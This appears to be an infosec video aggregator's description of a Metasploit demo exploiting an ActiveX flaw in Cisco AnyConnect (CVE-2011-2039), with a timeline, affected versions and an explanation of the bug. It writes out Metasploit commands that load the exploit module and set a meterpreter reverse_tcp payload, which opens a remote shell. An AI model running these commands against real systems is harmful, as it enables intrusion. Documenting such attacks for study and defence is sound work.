Description: Timeline :
Vulnerability discovered by Elazar Broad and submitted to iDefense Labs
Initial vulnerability notification to Cisco the 2009-02-24
Public release of Cisco Security Advisory 2011-06-01
Metasploit PoC provided by bannedit the 2011-06-06
PoC provided by:
bannedit
Reference(s) :
CVE-2011-2039
OSVDB-72714
CISCO-SA-20110601-AC
Affected versions :
For Windows all versions prior to 2.3.185
For Linux, Apple Mac OS X all versions in major releases other than 2.5.x and 3.0.x
2.5.x releases prior to 2.5.3041
3.0.x releases prior to 3.0.629
Microsoft Windows Mobile versions are affected, but no updated are planned.
Tested on Windows XP SP3
With Cisco AnyConnect VPN Client 2.0.0343
Description :
This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the 'url' property. One of these files it will be stored in a temporary directory and executed.
Metasploit demo :
use exploit/windows/browser/cisco_anyconnect_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
Tags: metasploit , cisco , vpn ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.